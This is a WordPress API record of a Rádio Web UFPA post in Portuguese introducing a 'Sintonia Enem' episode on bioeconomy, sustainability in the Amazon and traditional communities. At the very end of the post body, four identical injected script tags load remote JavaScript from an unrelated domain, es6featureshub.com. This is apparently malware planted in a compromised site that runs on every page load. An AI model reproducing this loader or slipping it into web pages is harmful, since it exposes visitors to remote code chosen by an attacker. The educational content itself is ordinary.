{"id":10833,"date":"2022-06-27T18:36:59","date_gmt":"2022-06-27T21:36:59","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=10833"},"modified":"2025-10-21T13:13:14","modified_gmt":"2025-10-21T16:13:14","slug":"bioeconomia","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/","title":{"rendered":"Bioeconomia"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/SINTONIA-ENEM-BIOECONOMIA-27.06.22.mp3'>Sintonia Enem - Bioeconomia<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/SINTONIA-ENEM-BIOECONOMIA-27.06.22.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"Sintonia Enem - Bioeconomia\",\"caption\":\"\",\"description\":\"\\\"SINTONIA ENEM - BIOECONOMIA - 27.06.22\\\". G\\u00eanero: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"Sintonia Enem\",\"genre\":\"Other\",\"length_formatted\":\"32:35\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n\n\n<p>Bioeconomia \u00e9 o assunto desta edi\u00e7\u00e3o do programa <a href=\"https:\/\/radio.ufpa.br\/index.php\/category\/sintonia-enem\/\" target=\"_blank\" rel=\"noreferrer noopener\">Sintonia Enem<\/a>. Quem conversa, por telefone, com a jornalista Elissandra Batista \u00e9 a professora de geografia <a href=\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/aquecimento-global\/\" target=\"_blank\" rel=\"noreferrer noopener\">Ana Tereza Correia<\/a>. Ela explica o contexto, a import\u00e2ncia e as formas poss\u00edveis da Bioeconomia, que exige a produ\u00e7\u00e3o econ\u00f4mica aliada a preserva\u00e7\u00e3o da natureza e aos direitos das comunidades tradicionais, incluindo popula\u00e7\u00f5es ind\u00edgenas, quilombolas e ribeirinhas.&nbsp; &nbsp;<\/p>\n\n\n\n<p>De acordo com Ana Tereza, a preocupa\u00e7\u00e3o com as quest\u00f5es ambientais no planeta come\u00e7ou de fato a ser discutida entre os pa\u00edses, durante a <a href=\"http:\/\/noticias.unb.br\/artigos-main\/5764-50-anos-do-dia-mundial-do-meio-ambiente-muito-a-celebrar-e-para-atentar\" target=\"_blank\" rel=\"noreferrer noopener\">Confer\u00eancia das Na\u00e7\u00f5es Unidas sobre o Meio Ambiente Humano<\/a>, realizada em 1972, em Estocolmo, capital da Su\u00e9cia. \u201cEssa confer\u00eancia \u00e9 um marco porque \u00e9 o momento em que o debate entre pa\u00edses sobre a quest\u00e3o ambiental entra em pauta. Principalmente, a preocupa\u00e7\u00e3o mundial com riscos ambientais em decorr\u00eancia de pol\u00edticas de industrializa\u00e7\u00e3o que vinham ocorrendo. Ent\u00e3o, a partir da\u00ed o mundo come\u00e7a a pensar como usufruir de recursos sem que se comprometa a vida das gera\u00e7\u00f5es futuras. Ent\u00e3o os pa\u00edses v\u00e3o realizando confer\u00eancias com o foco de estabelecer acordos para que as mudan\u00e7as sejam feitas e o ambiente seja preservado\u201d.<\/p>\n\n\n\n<p>Nesse contexto, propostas, a\u00e7\u00f5es e tecnologias em prol do chamado desenvolvimento sustent\u00e1vel se tornam cada vez mais discutidas e necess\u00e1rias para a garantia da vida no Planeta. Por isso, os especialistas defendem ser crucial produzir de forma que preserve a diversidade biol\u00f3gica, diminua a quantidade de lixo que vem sendo descartada de forma irregular e afetando drasticamente o ecossistema, al\u00e9m de utilizar os recursos que s\u00e3o esgot\u00e1veis sem que se exceda a capacidade de substitui\u00e7\u00e3o dos mesmos. E tudo isso em prol da diminui\u00e7\u00e3o das desigualdades sociais, porque n\u00e3o se pode mais falar de preserva\u00e7\u00e3o ou de desenvolvimento sustent\u00e1vel sem alinhar a economia com o meio ambiente e com a sociedade.<\/p>\n\n\n\n<p>E \u00e9 com essa perspectiva de tentar reduzir cada vez mais os impactos da economia sobre o meio ambiente que surge o conceito de Bioeconomia. Assim, a professora Ana Tereza destaca que \u201cquando falamos de Bioeconomia, falamos de uma cadeia de diversos processos, desde a base do produtor rural, incluindo cultivo, processamento, inser\u00e7\u00e3o dos produtos na ind\u00fastria, todos os segmentos e fases da cadeia produtiva. Ent\u00e3o a Bioeconomia proporciona uma economia vi\u00e1vel, com preserva\u00e7\u00e3o, com projetos de reflorestamento, preserva\u00e7\u00e3o de rios, etc.\u201d \u00a0<\/p>\n\n\n\n<p>Para a professora Ana Tereza, na Amaz\u00f4nia, regi\u00e3o rica em biodiversidade, com produtos de alto valor econ\u00f4mico e com mercados internacionais, o conceito de Bioeconomia precisa estar cada vez mais em debate e visibilidade, com o intuito de combater pr\u00e1ticas nocivas de produ\u00e7\u00e3o econ\u00f4mica, incluindo o desmatamento presente na monocultura e na pecu\u00e1ria, al\u00e9m de outros usos da terra que v\u00eam se mostrando desastrosos ao meio ambiente, como o avan\u00e7o dos garimpos ilegais na Amaz\u00f4nia, por exemplo.\u00a0<\/p>\n\n\n\n<p>\u201cPrecisamos de uma economia de base sustent\u00e1vel, como um mecanismo de afirmar o desenvolvimento da Amaz\u00f4nia e das comunidades locais tamb\u00e9m. Tendo e preservando a biodiversidade e a riqueza cultural. Lembrando que preservar a natureza de forma isolada n\u00e3o alcan\u00e7a a sua estabilidade, n\u00e3o \u00e9 efetivo, se a gente n\u00e3o conseguir ter mudan\u00e7as no \u00e2mbito social, mudan\u00e7as no \u00e2mbito de a\u00e7\u00f5es econ\u00f4micas\u201d, refor\u00e7a a professora Ana Tereza Correia.<\/p>\n\n\n\n<p>Para entender melhor os mecanismos que envolve o conceito de Bioeconomia, n\u00e3o perca esta edi\u00e7\u00e3o do Sintonia Enem. <\/p>\n\n\n\n<p>Apresenta\u00e7\u00e3o: Elissandra Batista<\/p>\n\n\n\n<p>Produ\u00e7\u00e3o e roteiro: Kelly Pinheiro<\/p>\n\n\n\n<p>Grava\u00e7\u00e3o e montagem: Denize Ramos<\/p>\n\n\n\n<p>Supervis\u00e3o: Elissandra Batista <\/p>\n\n\n\n<p>Imagem: reprodu\u00e7\u00e3o Google <\/p>\n\n\n\n<p>O programa Sintonia Enem vai ao ar diariamente, \u00e0s 15h.        <\/p>\n\n\n\n<p> &nbsp;&nbsp;<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Bioeconomia\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/\" aria-label=\"Read more about Bioeconomia\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":10837,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[740],"tags":[],"class_list":["post-10833","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sintonia-enem"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Bioeconomia - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Bioeconomia \u00e9 o assunto desta edi\u00e7\u00e3o do programa Sintonia Enem. Entenda o contexto, a import\u00e2ncia e as formas poss\u00edveis da Bioeconomia.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Bioeconomia - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Bioeconomia \u00e9 o assunto desta edi\u00e7\u00e3o do programa Sintonia Enem. Entenda o contexto, a import\u00e2ncia e as formas poss\u00edveis da Bioeconomia.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2022-06-27T21:36:59+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:13:14+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"735\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Bioeconomia\",\"datePublished\":\"2022-06-27T21:36:59+00:00\",\"dateModified\":\"2025-10-21T16:13:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/\"},\"wordCount\":648,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1\",\"articleSection\":[\"Sintonia Enem\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/\",\"name\":\"Bioeconomia - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1\",\"datePublished\":\"2022-06-27T21:36:59+00:00\",\"dateModified\":\"2025-10-21T16:13:14+00:00\",\"description\":\"Bioeconomia \u00e9 o assunto desta edi\u00e7\u00e3o do programa Sintonia Enem. Entenda o contexto, a import\u00e2ncia e as formas poss\u00edveis da Bioeconomia.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1\",\"width\":735,\"height\":400,\"caption\":\"Bioeconomia\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Bioeconomia\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Bioeconomia - Radio Web UFPA","description":"Bioeconomia \u00e9 o assunto desta edi\u00e7\u00e3o do programa Sintonia Enem. Entenda o contexto, a import\u00e2ncia e as formas poss\u00edveis da Bioeconomia.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/","og_locale":"pt_BR","og_type":"article","og_title":"Bioeconomia - Radio Web UFPA","og_description":"Bioeconomia \u00e9 o assunto desta edi\u00e7\u00e3o do programa Sintonia Enem. Entenda o contexto, a import\u00e2ncia e as formas poss\u00edveis da Bioeconomia.","og_url":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2022-06-27T21:36:59+00:00","article_modified_time":"2025-10-21T16:13:14+00:00","og_image":[{"width":735,"height":400,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Bioeconomia","datePublished":"2022-06-27T21:36:59+00:00","dateModified":"2025-10-21T16:13:14+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/"},"wordCount":648,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1","articleSection":["Sintonia Enem"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/","url":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/","name":"Bioeconomia - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1","datePublished":"2022-06-27T21:36:59+00:00","dateModified":"2025-10-21T16:13:14+00:00","description":"Bioeconomia \u00e9 o assunto desta edi\u00e7\u00e3o do programa Sintonia Enem. Entenda o contexto, a import\u00e2ncia e as formas poss\u00edveis da Bioeconomia.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1","width":735,"height":400,"caption":"Bioeconomia"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/sintonia-enem\/bioeconomia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Bioeconomia"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/article.jpg?fit=735%2C400&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2OJ","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10833","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=10833"}],"version-history":[{"count":22,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10833\/revisions"}],"predecessor-version":[{"id":17861,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10833\/revisions\/17861"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/10837"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=10833"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=10833"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=10833"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}